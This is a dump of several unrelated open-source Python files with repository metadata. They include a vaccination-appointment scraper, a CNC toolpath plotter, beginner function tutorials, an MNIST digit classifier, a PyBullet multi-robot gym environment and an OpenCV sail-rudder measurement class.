city = data["city"].strip()
# province = data["province"].strip()
# country = data["country"].strip()
postal = data["postal"].strip()
loc_address = address + ", " + city + ", " + postal
return loc_address
def check_locations(checking_locations, verbose_output):
config.resetLastAvailableDate()
for x in checking_locations:
if x["id"] not in exclude_ids:
loc_id = x["id"]
loc_name = location_id_data[loc_id]["loc_name"].replace(" ", " ")
loc_address = locAddyToAddress(location_id_data[loc_id]["address"])
unavailable = x["hasUnavailableAppointments"]
if verbose_output:
print(f"{loc_id} {loc_name} ({loc_address})")
if unavailable:
print(f"{loc_id} No appointments available.")
print("*" * 50)
if not unavailable:
earliest_date = requester.findEarliestDate(loc_id)
if earliest_date["available"]:
current_loc_data = earliest_date["nextByLocId"][0]
config_epoch = config.settings["earliest_epoch"]
next_epoch = current_loc_data["next_date"]
readable_time = current_loc_data["next"]
if config_epoch == 0 or next_epoch < config_epoch:
# Found new epoch!
value_list = [readable_time, next_epoch, loc_id, loc_name, loc_address]
key_list = ["earliest_date", "earliest_epoch", "earliest_loc_id", "earliest_loc_name",
"earliest_loc_address"]
config.updateKeys(key_list, value_list)
if verbose_output:
print(f"{loc_id} {readable_time}")
print("*" * 50)
def alertAvailableDate():
latest_epoch = config.settings["earliest_epoch"]
alert_epoch = config.settings["alert_epoch"]
last_epoch_alerted = config.settings["last_epoch_alerted"]
date = config.settings["earliest_date"]
loc_name = config.settings["earliest_loc_name"]
loc_address = config.settings["earliest_loc_address"]
if latest_epoch != 0 and last_epoch_alerted != latest_epoch:
if latest_epoch < alert_epoch:
# New Time is before alert epoch! Announce
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print(f"{loc_name} ({loc_address})")
print(f"ALERT NEW TIME: {date})")
config.update("last_epoch_alerted", latest_epoch)
else:
# This will output every time a different earliest date is available.
# Remove to only alert before the alert epoch
print(f"{loc_name} ({loc_address})")
print(f"AVAILABLE: {date}")
config.update("last_epoch_alerted", latest_epoch)
if __name__ == "__main__":
print("Pomelo Vaccination Appointment Date Scraper")
print("*" * 50)
parseLocationsToDict()
#requester.getHMSession()
active_locations = requester.getLocations()
check_locations(active_locations, True)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
for i in range(5000):
active_locations = requester.getLocations()
check_locations(active_locations, False)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
|
TASelwyn/PomeloScraper
|
main.py
|
main.py
|
py
| 4,417
|
python
|
en
|
code
| 0
|
github-code
|
6
|
1708447421
|
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import ball_endmill
from utility import mm_to_inch
from utility import plot_circle
def plot_spheremill_toolpos(params):
# Extract parameters
diam_tool = params['diam_tool']
diam_sphere = params['diam_sphere']
tab_thickness = params['tab_thickness']
offset_z = params['center_z'] + 0.5*diam_sphere
margin = params['margin']
# Plot sphere
cx_sphere = 0.0
cy_sphere = -0.5*diam_sphere + offset_z
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere)
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere+margin,'c')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere, cy_sphere], 'k')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere+0.5*tab_thickness, cy_sphere+0.5*tab_thickness], 'b')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere-0.5*tab_thickness, cy_sphere-0.5*tab_thickness], 'b')
# Plot ball nose end mills
toolpath_annulus_data = ball_endmill.get_toolpath_annulus_data(params)
for data in toolpath_annulus_data:
for sgn in (1,-1):
radius = sgn*data['radius']
step_z = data['step_z']
plot_circle(radius, step_z+0.5*diam_tool, 0.5*diam_tool,color='g')
plt.plot([radius], [step_z+0.5*diam_tool], '.g')
plt.plot([radius], [step_z], 'xr')
#plt.plot([radius, 0.0], [step_z+0.5*diam_tool,params['center_z']], 'r')
# Plot material boundaries
dx = 2*params['diam_sphere']
dy = 2*params['center_z']
plt.plot([-dx, dx], [0, 0],'k')
plt.plot([-dx, dx], [dy, dy], 'k')
# -----------------------------------------------------------------------------
if __name__ == '__main__':
params = {
'diam_sphere' : mm_to_inch(12.0),
'diam_tool' : 1.0/8.0 ,
'margin' : 0.0,
'step_size' : 0.01,
'tab_thickness' : 0.02,
'center_z' : -0.75/2.0,
}
fig_num = 1
plt.figure(fig_num)
plot_spheremill_toolpos(params)
plt.axis('equal')
plt.grid('on')
plt.show()
|
willdickson/sphere_mill_gcode
|
sphere_mill_gcode/ball_endmill_viz.py
|
ball_endmill_viz.py
|
py
| 2,135
|
python
|
en
|
code
| 0
|
github-code
|
6
|
25693073835
|
# coding=gbk
# ๅฝๆฐpart_3 ่ฟๅๅผ ๆดป็จreturn่ฏญๅฅ
# part_3.1 ่ฟๅ็ฎๅๅผ
def get_formatted_name(first_name, last_name):
"""่ฟๅๆดๆด็ๅงๅ"""
full_name = first_name + " " + last_name
return full_name.title()
musician = get_formatted_name('jen', 'hex')
print(musician)
# return่ฏญๅฅ่ฟๅ่ฐ็จๅฝๆฐ็ไปฃ็ ่ก
# ่ฐ็จ่ฟๅๅผ็ๅฝๆฐ้่ฆๅ ไธๅ้
# part_3.2 ่ฎฉๅฎๅๅๆๅฏ้ ๆ นๆฎไฝ็ฝฎๅฎๅ ไฝฟ็จ้ป่ฎคๅผๅฏไปฅ่ฎฉๅฎๅๅๆๅฏ้
def get_formatted_name(first_name, middle_name, last_name):
"""่ฟๅๆดๆด็ๅงๅ"""
full_name = first_name + " " +middle_name + " " + last_name
return full_name.title()
musician = get_formatted_name('jen' , 'lei', 'fu')
print(musician)
# ๅๅฆๅงๅไธญ้ดๆฒกๆ ้ฃไนๅฏไปฅ่ฐๆดๅฝขๅ็ไฝ็ฝฎ ไปฅๅ้ป่ฎคๅผ
def get_formatted_name(first_name, last_name, middle_name = ''):
"""่ฟๅๆดๆด็ๅงๅ"""
if middle_name:
full_name = first_name + " " +middle_name + " " + last_name
else:
full_name = first_name + " " + last_name
return full_name.title()
musician = get_formatted_name('lei', 'fu')
print(musician)
musician = get_formatted_name('lei', 'fu' ,'tian')
print(musician)
# if่ฏญๅฅ ไฝ็ฝฎๅฎๅ ้ป่ฎคๅผ
# part_3.3 ่ฟๅๅญๅ
ธ ๅฝๆฐไฝไธญๅฏไปฅ่ฎพ็ฝฎ ๅญๅ
ธ ๅ่กจ ๅญ็ฌฆไธฒ ๆฐๅผ ็จไธไธชๅ้่กจ็คบ
def build_person(first_name, last_name):
"""่ฟๅไธไธชๅญๅ
ธ๏ผ ๅ
ถไธญๅ
ๅซๆๅ
ณไธไธชไบบ็ไฟกๆฏ"""
person = {'first' : first_name, 'last' : last_name}
return person
musician = build_person('jen', 'hex')
print(musician)
# ่ฟๅๅญๅ
ธ ๅญๅจๅนด้พ
def build_person(first_name, last_name, age = ''):
"""่ฟๅไธไธชๅญๅ
ธ ๅ
ถไธญๅ
ๅซๆๅ
ณไธไธชไบบ็ไฟกๆฏ"""
person = {
'first' : first_name,
'last' : last_name,
}
if age:
person['age'] = age
return person
musician = build_person('jen', 'ten', age=27)
print(musician)
# part_3.4 ็ปๅไฝฟ็จๅฝๆฐๅwhileๅพช็ฏ
def get_formatted_name(first_name, last_name):
"""่ฟๅๆดๆด็ๅงๅ"""
full_name = first_name + " " + last_name
return full_name.title()
# ๅปบ็ซๅพช็ฏ
while True:
print("\nPlease tell me your name : ")
print("Enter 'q' at any time quit.")
f_name = input("First name : ")
if f_name == 'q':
break
l_name = input("Last name : ")
if l_name == 'q':
break
formatted_name = get_formatted_name(f_name, l_name)
print("\nHello, " + formatted_name + "!")
|
Troysps/learn_python
|
61/ๅฝๆฐ3_่ฟๅๅผ.py
|
ๅฝๆฐ3_่ฟๅๅผ.py
|
py
| 2,326
|
python
|
en
|
code
| 0
|
github-code
|
6
|
9661128383
|
def gcd(A: int, B: int):
if B == 0:
return A
else:
return gcd(B, A % B)
A, B = map(int, input())
result = gcd(A, B)
while result > 0:
print(1, end='')
result -= 1
# ํฐ์ชฝ์์ ์์ ์ชฝ์ ๋๋ ์ ๋จ์ด์ง๋ฉด ์์ ์ชฝ์ด ์ต๋ ๊ณต์ฝ์
# ๋๋์ด ๋จ์ด์ง์ง ์์ผ๋ฉด 1, 0์ด๋ฉด ๋๋จธ์ง ํ๋๊ฐ ์ต๋๊ณต์ฝ ์
|
java-squid/lets-algorithm
|
07--number-theory/ragdoll/1850.py
|
1850.py
|
py
| 365
|
python
|
ko
|
code
| 0
|
github-code
|
6
|
18597795385
|
class BankCard:
def __init__(self, number, cvc, first_name, last_name):
self.number = number
self.cvc = cvc
self.first_name = first_name
self.last_name = last_name
def _luhn_algorithm(self, value):
card_sum = 0
for index, digit in enumerate(value):
digit = int(digit)
if index % 2 == 0:
digit *= 2
if digit > 9:
digit -= 9
card_sum += digit
if card_sum % 10 != 0:
raise ValueError("Invalid card number")
@property
def number(self):
return self._number
@number.setter
def number(self, value):
if len(value) != 16:
raise ValueError("Card number length must be 16.")
if not value.isdigit():
raise ValueError("Card number must contains only integers.")
if value[0] not in ('4', '5'):
raise ValueError("Unsupported payment gateway.")
self._luhn_algorithm(value)
self._number = value
@property
def cvc(self):
return self._cvc
@cvc.setter
def cvc(self, value):
if len(value) != 3:
raise ValueError("Invalid cvc code")
self._cvc = value
bc1 = BankCard("4561261212345467", '13', None, None)
print(bc1)
|
pyteacher123/py35-onl
|
lesson15/classwork/task2.py
|
task2.py
|
py
| 1,323
|
python
|
en
|
code
| 2
|
github-code
|
6
|
10933119158
|
import os
import cv2 # commutator vision
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
mnist = tf.keras.datasets.mnist # The hand number nad what it is
(x_train, y_train), (x_test, y_test) = mnist.load_data() # split to training data and test data || x is the pixle data y is what Number
x_train = tf.keras.utils.normalize(x_train, axis=1) # make all valus 0 to 1 instaed of 1-255
x_test = tf.keras.utils.normalize(x_test, axis=1)
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten(input_shape=(28, 28))) # makes grid of pixles into one big line of 7840 pixles
model.add(tf.keras.layers.Dense(236, activation='relu')) # rectify linior unit
model.add(tf.keras.layers.Dense(10, activation="softmax")) # output layer || softmax = pick the most confident nuron
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(x_train, y_train, epochs=3) # Train model || epoch = how many time brain sees same data
model.save('HandWriteModel.model')
#model = tf.keras.models.load_model('HandWriteModel')
image_number = 1
while os.path.isfile(f"DigetsByMe\\diget{image_number}.png"):
try:
img = cv2.imread(f"DigetsByMe\\diget{image_number}.png")[:,:,0] # rgb?
img = np.invert(np.array([img]))
prediction = model.predict(img)
print(f"The number is {np.argmax(prediction)}")
plt.imshow(img[0], cmap=plt.cm.binary)
plt.show()
except:
print("Img is probable not 28 by 28")
finally:
image_number += 1
loss, accuracy = model.evaluate(x_test, y_test)
print(loss)
print(accuracy)
|
Zippy-boy/HandDigets
|
main.py
|
main.py
|
py
| 1,658
|
python
|
en
|
code
| 0
|
github-code
|
6
|
33702855496
|
import socket
HOST = "127.0.0.1" # localhost
PORT = 1234 # pixelflut-port
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((HOST, PORT))
XMIN=641
XMAX=1279
YMIN=0
YMAX=719
for y in range(YMIN, YMAX+1):
for x in range(XMIN, XMAX+1):
msg = bytes(f"PX {x} {y} FF0000\n", "UTF-8")
sock.sendall(msg)
|
HacktoberfestMunich/Hacktoberfest-2023
|
Teams/red_titans/src/RedBackground.py
|
RedBackground.py
|
py
| 403
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73700516027
|
import os, time, gc
import numpy as np
import gym
import random
from gym import spaces
from gym.utils import seeding
from screeninfo import get_monitors
import pybullet as p
from .agents.objects import Object
from .util import Util
from .agents.agent import Agent
class BaseEnv(gym.Env):
def __init__(self, time_step=0.02, frame_skip=5, render=False, gravity=-9.81, seed=1001):
self.time_step = time_step
self.frame_skip = frame_skip
self.gravity = gravity
self.id = None
self.gui = False
self.gpu = False
self.view_matrix = None
self.seed(seed)
if render:
self.render()
else:
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
self.directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'assets')
# Define action space for each robot
self.action_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
action_robot_len = len(robot_class.controllable_joint_indices)
# Add gripper action if gripper is enabled
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
action_robot_len += 1
elif len(self.gripper_enabled_robots) != len(self.my_robots):
print("Gripper enabling mode for robots needs to be defined for every single robot")
exit()
self.action_space_robot[robot_name] = spaces.Box(low=np.array([-1.0]*action_robot_len, dtype=np.float32), high=np.array([1.0]*action_robot_len, dtype=np.float32), dtype=np.float32)
# Define observation space for each robot
self.observation_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
if len(self.obs_len_robots) == len(self.my_robots):
obs_robot_len = self.obs_len_robots[robot_name]
else:
print("Received observation lenghts for robots needs to be defined for every single robot")
exit()
self.observation_space_robot[robot_name] = spaces.Box(low=np.array([-1000000000.0]*obs_robot_len, dtype=np.float32), high=np.array([1000000000.0]*obs_robot_len, dtype=np.float32), dtype=np.float32)
self.plane = Agent()
def step(self, action):
raise NotImplementedError('Implement observations')
def _get_obs(self, agent=None):
raise NotImplementedError('Implement observations')
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def set_seed(self, seed=1000):
self.np_random.seed(seed)
def enable_gpu_rendering(self):
self.gpu = True
def disconnect(self):
p.disconnect(self.id)
def reset(self):
p.resetSimulation(physicsClientId=self.id)
if not self.gui:
# Reconnect the physics engine to forcefully clear memory when running long training scripts
self.disconnect()
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
if self.gpu:
self.util.enable_gpu()
# Configure camera position
p.resetDebugVisualizerCamera(cameraDistance=8, cameraYaw=90, cameraPitch=-30, cameraTargetPosition=[0, 0, 1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_MOUSE_PICKING, 0, physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0, physicsClientId=self.id)
p.setTimeStep(self.time_step, physicsClientId=self.id)
# Disable real time simulation so that the simulation only advances when we call stepSimulation
p.setRealTimeSimulation(0, physicsClientId=self.id)
p.setGravity(0, 0, self.gravity, physicsClientId=self.id)
self.last_sim_time = None
self.iteration = 0
self.task_success_clock = 0
self.task_success_switch = False
self.task_success = {}
for robot_name, robot in self.my_robots.items():
self.task_success[robot_name] = 0
self.updatable_objects = {}
Object.instances = []
self.threshold_picking = 0.02
def create_world(self):
# Load the ground plane
plane = p.loadURDF(os.path.join(self.directory, 'plane', 'plane.urdf'), physicsClientId=self.id)
self.plane.init(plane, self.id, self.np_random, indices=-1)
# Randomly set friction of the ground
# self.plane.set_frictions(self.plane.base, lateral_friction=self.np_random.uniform(0.025, 0.5), spinning_friction=0, rolling_friction=0)
# Disable rendering during creation
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0, physicsClientId=self.id)
# Create robots
for _, robot in self.my_robots.items():
robot.init(self.directory, self.id, self.np_random)
robot.set_gravity(0, 0, 0)
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere = self.create_sphere(radius=0.003, mass=0.0, pos=finger_COM_pos, collision=False, rgba=[0.5, 0.5, 0.5, 0.5])
def take_step(self, actions, gains=None, forces=None, action_multiplier=0.05, step_sim=True):
if self.last_sim_time is None:
self.last_sim_time = time.time()
self.iteration += 1
for i, (robot_name, robot) in enumerate(self.my_robots.items()):
robot_actions = actions[robot_name].copy()
robot_actions = np.clip(robot_actions, a_min=self.action_space_robot[robot_name].low, a_max=self.action_space_robot[robot_name].high)
robot_actions *= action_multiplier
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
joint_actions = robot_actions[:-1]
gripper_action = True if robot_actions[-1]<0 else False
else:
joint_actions = robot_actions
joint_actions *= robot.action_multiplier
# Append the new action to the current measured joint angles
robot_joint_angles = robot.get_joint_angles(robot.controllable_joint_indices)
# Update the target robot joint angles based on the proposed action and joint limits
for _ in range(self.frame_skip):
below_lower_limits = robot_joint_angles + joint_actions < robot.controllable_joint_lower_limits
above_upper_limits = robot_joint_angles + joint_actions > robot.controllable_joint_upper_limits
joint_actions[below_lower_limits] = 0
joint_actions[above_upper_limits] = 0
robot_joint_angles[below_lower_limits] = robot.controllable_joint_lower_limits[below_lower_limits]
robot_joint_angles[above_upper_limits] = robot.controllable_joint_upper_limits[above_upper_limits]
robot_joint_angles += joint_actions
robot.control(robot.controllable_joint_indices, robot_joint_angles, robot.motor_gains, robot.motor_forces)
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
self.update_grippable_objects(gripper_action, robot_name, robot)
if step_sim:
# Update all agent positions
for _ in range(self.frame_skip):
p.stepSimulation(physicsClientId=self.id)
self.update_targets()
self.update_objects()
self.update_robot_finger_COM()
if self.gui:
# Slow down time so that the simulation matches real time
self.slow_time()
def slow_time(self):
# Slow down time so that the simulation matches real time
t = time.time() - self.last_sim_time
if t < self.time_step:
time.sleep(self.time_step - t)
self.last_sim_time = time.time()
def update_targets(self):
pass
def update_objects(self):
pass
def update_grippable_objects(self, gripper_action, robot_name, robot):
all_distances = []
if self.gripper_enabled_robots[robot_name]:
for object_name, obj in self.all_grippable_objects.items():
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
finger_COM_pos, finger_COM_orien = robot.get_finger_COM()
obj_pos, _ = obj.get_pos_orient(joint)
dist_finger_COM_to_obj = abs(np.linalg.norm(obj_pos-finger_COM_pos))
all_distances.append(abs(dist_finger_COM_to_obj))
# When distance is lower than threshold then set robot.grippable[object_name]['grippable'] to True
robot.grippable[object_name]['grippable']['joint_'+str(joint)] = True if dist_finger_COM_to_obj < self.threshold_picking else False
# If robot is ready to grip and the object is grippable then update its position
if robot.grippable[object_name]['grippable']['joint_'+str(joint)] and gripper_action:
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is None:
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = p.createConstraint(robot.body, robot.end_effector, obj.body, joint, p.JOINT_POINT2POINT, [0, 0, 0], parentFramePosition=[0,0,0], childFramePosition=[0, 0, 0], parentFrameOrientation=[0,0,0,1], childFrameOrientation=[0, 0, 0, 1], physicsClientId=self.id)
# robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
else:
robot.its_gripping = False
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is not None:
p.removeConstraint(robot.grippable[object_name]['constraint']['joint_'+str(joint)], physicsClientId=self.id)
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
# robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.visual_gripping = True if any(i<0.03 for i in all_distances) else False
constraints_list = []
for object_name, obj in self.all_grippable_objects.items():
for const_id, const in robot.grippable[object_name]['constraint'].items():
constraints_list.append(const)
if all(v is None for v in constraints_list):
robot.its_gripping = False
robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.buff = 0
else:
robot.its_gripping = True
if robot.buff == 0 and robot.visual_gripping:
robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
robot.buff =+ 1
def update_robot_finger_COM(self):
for robot_name, robot in self.my_robots.items():
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere.set_base_pos_orient(finger_COM_pos, [0, 0, 0, 1])
def render(self, mode='human'):
if not self.gui:
self.gui = True
if self.id is not None:
self.disconnect()
try:
self.width = get_monitors()[0].width
self.height = get_monitors()[0].height
except Exception as e:
self.width = 1920
self.height = 1080
self.id = p.connect(p.GUI, options='--background_color_red=0.81 --background_color_green=0.93 --background_color_blue=0.99 --width=%d --height=%d' % (self.width, self.height))
self.util = Util(self.id, self.np_random)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def setup_camera(self, camera_eye=[0.5, -0.75, 1.5], camera_target=[-0.2, 0, 0.75], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrix(camera_eye, camera_target, [0, 0, 1], physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def setup_camera_rpy(self, camera_target=[-0.2, 0, 0.75], distance=1.5, rpy=[0, -35, 40], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(camera_target, distance, rpy[2], rpy[1], rpy[0], 2, physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def get_camera_image_depth(self, light_pos=[0, -3, 1], shadow=False, ambient=0.8, diffuse=0.3, specular=0.1):
assert self.view_matrix is not None, 'You must call env.setup_camera() or env.setup_camera_rpy() before getting a camera image'
w, h, img, depth, _ = p.getCameraImage(self.camera_width, self.camera_height, self.view_matrix, self.projection_matrix, lightDirection=light_pos, shadow=shadow, lightAmbientCoeff=ambient, lightDiffuseCoeff=diffuse, lightSpecularCoeff=specular, physicsClientId=self.id)
img = np.reshape(img, (h, w, 4))
depth = np.reshape(depth, (h, w))
return img, depth
def create_sphere(self, radius=0.01, mass=0.0, pos=[0, 0, 0], visual=True, collision=True, rgba=[0, 1, 1, 1], maximal_coordinates=False, return_collision_visual=False):
sphere_collision = p.createCollisionShape(shapeType=p.GEOM_SPHERE, radius=radius, physicsClientId=self.id) if collision else -1
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=radius, rgbaColor=rgba, physicsClientId=self.id) if visual else -1
if return_collision_visual:
return sphere_collision, sphere_visual
body = p.createMultiBody(baseMass=mass, baseCollisionShapeIndex=sphere_collision, baseVisualShapeIndex=sphere_visual, basePosition=pos, useMaximalCoordinates=maximal_coordinates, physicsClientId=self.id)
sphere = Agent()
sphere.init(body, self.id, self.np_random, indices=-1)
return sphere
def randomize_init_joint_angles(self, min_dist=0.5, radius=2, joint_randomness=0.15):
done = False
while not done:
# random_angles = {}
# # Generate random angles for each robot
# for robot_name, robot in self.my_robots.items():
# random_angles[robot_name] = []
# for joint in robot.arm_joint_indices:
# random_angles[robot_name].append(self.np_random.uniform(robot.lower_limits[joint]*joint_randomness, robot.upper_limits[joint]*joint_randomness))
# robot.set_joint_angles(robot.arm_joint_indices, random_angles[robot_name])
for robot_name, robot in self.my_robots.items():
robot_pos, _ = robot.get_base_pos_orient()
random_end_effector_pos = [random.uniform(robot_pos[0]-radius, robot_pos[0]+radius),
random.uniform(robot_pos[1]-radius, robot_pos[1]+radius),
random.uniform(robot_pos[2], robot_pos[2]+radius)]
self.set_end_effector_pos(robot, random_end_effector_pos, threshold=1e-2, maxIter=100)
# Collect all joint pos and obj pos(last 4 joints is enough)
joints_pos = {}
for robot_name, robot in self.my_robots.items():
joints_pos[robot_name] = []
for joint in robot.arm_joint_indices[-5:]:
j_pos, _ = robot.get_pos_orient(joint)
joints_pos[robot_name].append(j_pos)
objects_pos = []
for obj in Object.instances:
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
obj_pos, _ = obj.get_pos_orient(joint)
objects_pos.append(obj_pos)
# Check for collision between robots and objects in the environment
done = True
for robot_name_i, robot_i in self.my_robots.items():
for robot_name_j, robot_j in self.my_robots.items():
if robot_name_i != robot_name_j:
joints_pos_i = joints_pos[robot_name_i]
joints_pos_j = joints_pos[robot_name_j]
for joint_pos_i in joints_pos_i:
for joint_pos_j in joints_pos_j:
dist = np.linalg.norm(joint_pos_i-joint_pos_j)
if abs(dist) < min_dist:
done = False
for robot_name, robot in self.my_robots.items():
for obj_pos in objects_pos:
joint_pos = joints_pos[robot_name]
dist = np.linalg.norm(joint_pos-dist)
if abs(dist) < min_dist:
done = False
def set_end_effector_pos(self, robot, target_position, target_orient=None, threshold=1e-15, maxIter=1000):
if target_orient is not None and len(target_orient) == 3:
target_orient = self.get_quaternion(target_orient)
closeEnough = False
iter = 0
dist2 = 1e30
while (not closeEnough and iter < maxIter):
joint_pos = p.calculateInverseKinematics(bodyIndex=robot.body, endEffectorLinkIndex=robot.end_effector, targetPosition=target_position, targetOrientation=target_orient, physicsClientId=self.id)
robot.set_joint_angles_all(joint_pos)
ls = p.getLinkState(robot.body, robot.end_effector)
newPos = ls[4]
diff = [target_position[0] - newPos[0], target_position[1] - newPos[1], target_position[2] - newPos[2]]
dist2 = (diff[0] * diff[0] + diff[1] * diff[1] + diff[2] * diff[2])
closeEnough = (dist2 < threshold)
iter = iter + 1
def disable_collision(self, obj_1, obj_2):
body_1 = obj_1.body
body_2 = obj_2.body
for i in range(p.getNumJoints(body_1, physicsClientId=self.id)):
for j in range(p.getNumJoints(body_2, physicsClientId=self.id)):
p.setCollisionFilterPair(body_1, body_2, i, j, 0, physicsClientId=self.id)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def init_env_variables(self):
# Select all grippable objects
i = 0
self.all_grippable_objects = {}
for obj in Object.instances:
if obj.enable_gripping:
i += 1
object_name = 'object_' + str(i)
self.all_grippable_objects[object_name] = obj
for robot_name, robot in self.my_robots.items():
robot.buff = 0
robot.grippable = {}
robot.ready_to_grip = False
for object_name, obj in self.all_grippable_objects.items():
robot.grippable[object_name] = {'obj': obj, 'grippable': {}, 'constraint': {}}
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
|
gabriansa/collaborative-gym
|
collaborative_gym/envs/base_env.py
|
base_env.py
|
py
| 20,082
|
python
|
en
|
code
| 0
|
github-code
|
6
|
35037176201
|
import cv2
import numpy as np
from analyzers.analyseContour import AnalyseContour
from analyzers.contour import Contour
class AnalyseSafran(AnalyseContour):
"""
Class qui mesure la taille du safran qui sort de l'eau.
Attributs:
x1RefPoint (int): coordonnรฉe x du premier point de rรฉfรฉrence correspond au point le plus haut du safran.
y1RefPoint (int): coordonnรฉe y du premier point de rรฉfรฉrence correspond au point le plus haut du safran.
x2RefPoint (int): coordonnรฉe x du deuxiรจme point de rรฉfรฉrence pour calculer la droite du safran.
y2RefPoint (int): coordonnรฉe y du deuxiรจme point de rรฉfรฉrence pour calculer la droite du safran.
"""
def __init__(self, x1, y1, x2, y2, x1RefPoint, y1RefPoint, x2RefPoint, y2RefPoint, qualityLimit):
super().__init__(x1, y1, x2, y2, qualityLimit)
self.x1RefPoint = x1RefPoint - x1
self.y1RefPoint = y1RefPoint - y1
self.x2RefPoint = x2RefPoint - x1
self.y2RefPoint = y2RefPoint - y1
def compute(self, frame):
"""
Mรฉthode qui mesure la taille du safran qui sort de l'eau.
"""
m = (self.y2RefPoint - self.y1RefPoint) / (self.x2RefPoint - self.x1RefPoint)
p = self.y1RefPoint - m * self.x1RefPoint
cropFrame = frame[self.y1:self.y2, self.x1:self.x2]
qualityIndex = self.embrunDetection.detection(cropFrame)
# Conversion en noir et blanc et floutage
gray_img_safran = cv2.cvtColor(cropFrame, cv2.COLOR_BGR2GRAY)
gray_img_safran = cv2.GaussianBlur(gray_img_safran, (3, 7), 0)
# Dessins de toutes les bordures
median_pix = np.median(gray_img_safran)
lower = int(max(0, 0.5*median_pix))
upper = int(min(255, 1.3*median_pix))
edged = cv2.Canny(gray_img_safran, lower, upper)
# Dรฉtection des contours
# La variable de hiรฉrarchie contient des informations sur la relation entre chaque contour. (si un contour est dans un contour)
contours_list_safran, hierarchy = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours_list_safran:
contourSafran = None
for c in contours_list_safran:
# Si un contour est ร moins de 15 pixel du point (point sur le bord avant du safran)
if abs(cv2.pointPolygonTest(c, (self.x1RefPoint + 1, self.y1RefPoint + 3), True)) < 15:
contourSafran = c
tOffSetSafran = (self.x1, self.y1)
points = []
# Regarde si les points correspondent plus ou moins ร l'รฉquation du safran
# Equation qui reprรฉsente la droite au niveau du safran
for point in c:
x = point[0][0]
y = point[0][1]
# Rรฉsultat de l'รฉquation
resultEquation = m * x - y + p
if resultEquation > -15 and resultEquation < 15:
points.append((x, y))
if len(points) >= 2:
# firstPointSafran = min(points, key=lambda x:x[1]) # Plus petite valeur en y
firstPointSafran = (self.x1RefPoint, self.y1RefPoint)
# Plus grande valeur en y
secondPointSafran = max(points, key=lambda x: x[1])
# Ajout du dรฉcalage pour correspondre sur l'image original
firstPointSafranOffSet = tuple(map(lambda x, y: x + y, firstPointSafran, tOffSetSafran))
secondPointSafranOffSet = tuple(map(lambda x, y: x + y, secondPointSafran, tOffSetSafran))
hauteurSafran = secondPointSafran[1] - firstPointSafran[1]
# Dรฉcalage des coordonnรฉes du contour pour correspondre sur l'image original (frame)
contourSafranOffset = contourSafran + (self.x1, self.y1)
return Contour(hauteurSafran, contourSafranOffset, firstPointSafranOffSet, secondPointSafranOffSet, qualityIndex)
return Contour(None, None, None, None, qualityIndex)
|
Torystan/analyse-images
|
